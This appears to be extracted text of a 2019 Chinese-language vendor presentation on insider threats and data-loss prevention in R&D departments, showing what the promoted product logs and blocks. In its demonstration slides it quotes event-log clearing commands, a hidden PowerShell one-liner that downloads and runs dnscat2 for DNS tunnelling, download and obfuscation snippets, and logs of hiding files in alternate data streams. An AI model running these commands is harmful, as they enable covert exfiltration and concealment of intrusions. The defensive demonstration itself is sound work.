正面迎戰內部威脅，公司被害還是員工被駭？™³伯榆.pdfIT資安與稽核應了解研發單位的應用 System & DLL Network API CMD & Shell Hardware • System

正面迎戰內部威脅，公司被害? 還是員工被駭？

FineArt - Victor Chen

資安風險維持Top 5，資料外洩 > 網路攻擊The Global Risks Report 2019 14th Edition

http://www3.weforum.org/docs/WEF_Global_Risks_Report_2019.pdf

風險可能性衝擊

Top 5 Global Risks in Terms of Likelihood The Global Risks Landscape 2019

情資收集者最感興趣的六大領域

2018 Foreign Economic Espionage in Cyberspace reporthttps://www.dni.gov/files/NCSC/documents/news/20180724-economic-espionage-pub.pdf

Industry Priority Sectors/ Technologies

Energy/

Alternative

Energy

(能源/替代能源)

• Advanced pressurized

water reactor and high-

temperature, gas-

cooled nuclear power

stations

• Biofuels

• Energy-efficient

industries

• Oil, gas, and coalbed

methane development,

including fracking

• Smart grids

• Solar energy technology

• Wind turbines

Biotechnology

(生物技術)

• Advanced medical

devices

• Biomanufacturing and

chemical

manufacturing

• Biomaterials

• Biopharmaceuticals

• Genetically modified

organisms

• Infectious disease

treatment

• New vaccines and drugs

Defense

(國防科技)

• Aerospace &

aeronautic system

• Armaments

• Marin system

• Radar

• Optics

Environmental

Protection

(環境保護)

• Batteries

• Energy-efficient

appliances

• Green building

materials

• Hybrid and electric cars

• Waste management

• Water/air pollution control

Industry Priority Sectors/ Technologies

High-end

Manufacturing

(高端製造業)

• 3D Printing

• Advanced robotics

• Aircraft engines

• Aviation maintenance and

service sectors

• Civilian aircraft

• Electric motors

• Foundational manufacturing

equipment

• High-end computer

numerically controlled

machines

• High-performance

composite materials

• High-performance sealing

materials

• Integrated circuit

manufacturing equipment

and assembly technology

• Space infrastructure and

exploration technology

• Synthetic rubber

Information And

Communications

Technology

(信息通信技術)

• Artificial intelligence

• Big data analysis

• Core electronics industries

• E-commerce service

• Foundational software

products

• High-end computer chips

• Internet of thing

• Network equipment

• Next-generation broadband

wireless communications

networks

• Quantum computing and

communications

• Rare-earth materials

研發部門是企業命脈，卻最難管理

研發工程師工作環境

JTag

開發板

Servers (Data / DB)

IDE Application

Source code

RJ-45

HDL ToolsSimulatorIn-Circuit-TestCAX / EDA toolLayout Tools / PCB

DBSVNFileTest

Machine

R&D

SVS+SVT滿足研發開發工具之使用保護

System & DLL

Network API

CMD & Shell

Hardware

• System Call • Out Put File

• Download / Upload• Tunnel / Cloud Application• Custom Protocol

• CMD +• Power Shell Script• Run Executable(EXE)

• Connect to Hardware Device

• 3rd Party Application Screen / Video Capture

• Print Image• Pip Process (IPC)

IDEApplication

R&DKey Verification

Screen Capture

SVS + SVT 滿足對研發智慧財產完整保護

Prohibited/

Controlled

R&D專案開發電腦

可限制多種操作行為列印、PrtScr、IPC

CTRL-C + CTRL-V

Controlled

SVT Allowed

可正常使用SVN、開發板

可限制貼出字數

Demo 1 Visual Studio 寫出保護，系統防守

Visual Studio寫出儲存時，即受到保護

Visual Studio政策防守：Prohibited Call System

可以依據各產業別特殊工具進行防守與管控，確保智慧資產不會外洩。

指令環境下的風險，資安與稽核知多少?

IT資安與稽核應了解研發單位的應用

System & DLL

Network API

CMD & Shell

Hardware

• System Call • Out Put File

• Download / Upload• Tunnel / Cloud Application• Custom Protocol

• CMD +• Power Shell Script• Run Executable(EXE)

• Connect to Hardware Device

• 3rd Party Application Screen / Video Capture

• Print Image• Pip Process (IPC)

IDEApplication

R&DKey Verification

Screen Capture

OS defaultFunction & AP

IDE CallCommand

3rd PartyApplication

• Cmd.exe• Windows PowerShell• PowerShell ISE

• Call cmd.exe• Call PowerShell• Call exe

• ConEmu• PSReadLine• PSGet• Chocolatey• Babun (optional)• Cmder• Git Bash by MinGW & MinTTY• WSL ubuntu on windows• Cygwin• Xshell

• Console2• Powershell ise• Powershell• Dell powerGUI• Sapien Powershell studio• AWS tools for Powershell• Adam driscoll's powershell• Powershell web access,• Master-powershell• Vmware vsphere powerCLI

CMD 與PowerShell 環境分析

{ }

SDK Command

cmd軌跡記錄

SVS 安全碟

軟體安控

程序記錄

網路行為記錄

SVT 加密通道

從小處可以一窺指令軌跡記錄的重要性

Clear-EventLog -LogName System

Clear-EventLog -LogName Security

Clear-EventLog -LogName Application

DNS Tunnel with PowerShell

powershell.exe -nop -w hidden -c {IEX(New-Object System.Net.Webclient).DownloadString('https://pt.cyber-redteam.info/ dnscat2-

powershell/master/dnscat2.ps1’);

Start-Dnscat2 -Domain dnsch.cirrus.[domain] -PreSharedSecret dnschcirrus}

PowerShell Dodge 3 ways to download files with PowerShell Code Obfuscator

–WindowStyle hidden / -w

hidden

–Exec Bypass

–Command / -c

–EncodedCommand / -e / -Enc

–Nop / -Noprofile

Invoke-WebRequest

$url = "http://pt.cyber-redteam.info/risktest/Obfuscator.txt"

$output = "$PSScriptRoot\real.ps1"

$start_time = Get-Date

$readteam = New-Object System.Net.WebClient

$ readteam.DownloadFile($url, $output)

Crunchcode (VBA)

ScriptCryptor (VBA, JavaScript)

CodeProtection (VBA)

Vbad (VBA)

Stunnix (C++, Perl, JavaScript, VBScript )

Scripts Encryptor

(HTML,JavaScript/JScript, C/C++/MFC)

ISESteroids(PowerShell)System.Net.WebClient

−(New-object System.net.webclient).DownlodFile()

−(New-object System.net.Webclient).DownloadString()

Start-BitsTransfer

Start-BitsTransfer -Source $url -Destination $output -

Asynchronous Write-Output "Time taken: $((Get-

Date).Subtract($start_time).Seconds) second(s)"

Clean all event-log

dnscat2.ps1

Demo 2 各類指令行為軌跡記錄Invoke-Obfuscation

Teensy + Alternate Data Streams (ADS)

+

記錄時間使用者帳號應用程式名稱命令內容部門名稱使用者全名電腦名稱 IP PID 伺服器儲存時間

2019/03/12 DEMO01 powershell.exe Import-Module ./Invoke-Obfuscation.psd1IT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 5056 2019/03/12

2019/03/12 DEMO01 powershell.exe cd .\Invoke-Obfuscation-master\IT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 5056 2019/03/12

2019/03/12 DEMO01 powershell.exe cd .\Desktop\ IT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 5056 2019/03/12

2019/03/12 DEMO01 powershell.exe IT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 5056 2019/03/12


2019/03/12 DEMO01 powershell.exe cd .\Desktop\ IT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 14196 2019/03/12

2019/03/12 DEMO01 powershell.exe dir IT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 14196 2019/03/12

2019/03/12 DEMO01 powershell.exe cd .\user\ IT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 14196 2019/03/12


2019/03/12 DEMO01 powershell.exe cd .\Users\ IT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 14196 2019/03/12


2019/03/12 DEMO01 powershell.exe cd\ IT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 14196 2019/03/12

2019/03/12 DEMO01 powershell.exe copy c:\User\user\Desktop\XConsole.exe d:IT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 14196 2019/03/12

2019/03/12 DEMO01 powershell.exe cd .\user\ IT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 14196 2019/03/12

2019/03/12 DEMO01 powershell.exe cd .\Users\ IT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 14196 2019/03/12

2019/03/12 DEMO01 powershell.exe cd\ IT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 14196 2019/03/12



記錄時間使用者帳號應用程式名稱命令內容部門名稱使用者全名電腦名稱 IP PID 伺服器儲存時間

2019/03/12 DEMO01 CMD.exe wordpad fake.docx:AI.DOCX IT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 5096 2019/03/12

2019/03/12 DEMO01 CMD.exe wordpad fake.docx IT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 5096 2019/03/12

2019/03/12 DEMO01 CMD.exe wordpade fake.docx IT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 5096 2019/03/12

2019/03/12 DEMO01 CMD.exe wordpade f wordpade fake.docxIT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 5096 2019/03/12

2019/03/12 DEMO01 CMD.exe dir IT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 5096 2019/03/12

2019/03/12 DEMO01 CMD.exe DEL AI.DOCX IT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 5096 2019/03/12

2019/03/12 DEMO01 CMD.exe WMIC DATAFILE WHERE DRIVE='C:' AND eXTENSION='DOCX' LISTIT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 5096 2019/03/12

2019/03/12 DEMO01 CMD.exe E: IT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 5096 2019/03/12

2019/03/12 DEMO01 CMD.exe TYPE AI.DOCX>>FAKE.DOCX:AI.DOCXIT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 5096 2019/03/12

2019/03/12 DEMO01 CMD.exe COPY D:AI.DOCX E: IT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 5096 2019/03/12

2019/03/12 DEMO01 CMD.exe COPY D:FAKE.DOCX E: IT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 5096 2019/03/12

2019/03/12 DEMO01 CMD.exe FORMAT E: /FS:NTFS /Q /V:ads IT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 5096 2019/03/12

2019/03/12 DEMO01 cmd.exe ipconfig IT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 8708 2019/03/12

內部網路活動，資安有風險?

分析企業網路架構

1. 阻斷外部網路服務

2. 部分開放外部網路服務 (實體隔離)

3. 開放外部網路服務

外部網路服務

內部網路服務

企業組織網路型態

外部DNS

官網

外部郵件

內部DNS

主管資訊系統

內部郵件

其他

安全防護與網路架構

各類型防火牆

VPN

雲端架構

資料倉儲

端點裝置

分點網路架構

外部裝置

無人看管

出差裝置

行動裝置 VoIP

WiFi

SVNCRM

ERP

端點網路活動，找出風險

Role IP/Domain Channel Port Protocol Action Software Interested Time

1. 員工

2. 駭客

3. OS

4. 程序

InternetIntranet

LocalhostX

白名單黑名單風險目標觀察名單

X來源/目的

NormalProxyTunnelSVT

白名單黑名單警示通訊埠

TCPUDPDNS

其他自訂協定

拷貝/刪除更名/複製搬移檔案

上傳檔案貼出文字拖拉檔案

IM

FTP

P2P

TorNet

檔案大小檔案數量頻率規則檔案變動檔案名稱檔案Hash

上班時間下班時間半夜

人地事物時

內部網路服務

內部DNS

主管資訊系統

內部郵件

資料倉儲

端點裝置

SVNCRM

ERP

Takeafile & Onion Share 2.0 防守與網路記錄阻擋所有拖曳檔案到瀏覽器禁止應用程式執行&阻擋拖曳檔案到瀏覽器

記錄網路連結行為，目的地洋蔥網路記錄網路連結行為(UDP)

https://takeafile.com/

瀏覽日期使用者帳號 IP 網址瀏覽器名稱

2019/03/12 15:54 DEMO01 192.168.218.1 http://zcekmfrons74xzuufrlhstqxccmctfjhyovl25p4ftdyncj5samatcqd.onion/peso-linguinionionshare-gui.exe

2019/03/12 15:54 DEMO01 192.168.218.1 http://zcekmfrons74xzuufrlhstqxccmctfjhyovl25p4ftdyncj5samatcqd.onion/static/img/favicon.icoonionshare-gui.exe

2019/03/12 15:54 DEMO01 192.168.218.1 http://zcekmfrons74xzuufrlhstqxccmctfjhyovl25p4ftdyncj5samatcqd.onion/static/css/style.cssonionshare-gui.exe

2019/03/12 15:54 DEMO01 192.168.218.1 http://zcekmfrons74xzuufrlhstqxccmctfjhyovl25p4ftdyncj5samatcqd.onion/peso-linguini/downloadonionshare-gui.exe

2019/03/12 15:54 DEMO01 192.168.218.1 http://zcekmfrons74xzuufrlhstqxccmctfjhyovl25p4ftdyncj5samatcqd.onion/static/img/web_file.pngonionshare-gui.exe

2019/03/12 15:54 DEMO01 192.168.218.1 http://zcekmfrons74xzuufrlhstqxccmctfjhyovl25p4ftdyncj5samatcqd.onion/static/img/logo.pngonionshare-gui.exe

Time Source Destination Protocol Length Info

5.154527 192.168.1.188 192.168.1.170 DTLSv1.2 1279 Application Data






https://takeafile.com/

企業防洩密。資安找精品

www.fineart-tech.com

Documents

正面迎戰內部威脅， 公司被害 還是員工被駭？™³伯榆.pdfIT資安與稽核應了解研發單位的應用 System & DLL Network API CMD & Shell Hardware • System

正面迎戰內部威脅，公司被害還是員工被駭？™³伯榆.pdfIT資安與稽核應了解研發單位的應用 System & DLL Network API CMD & Shell Hardware • System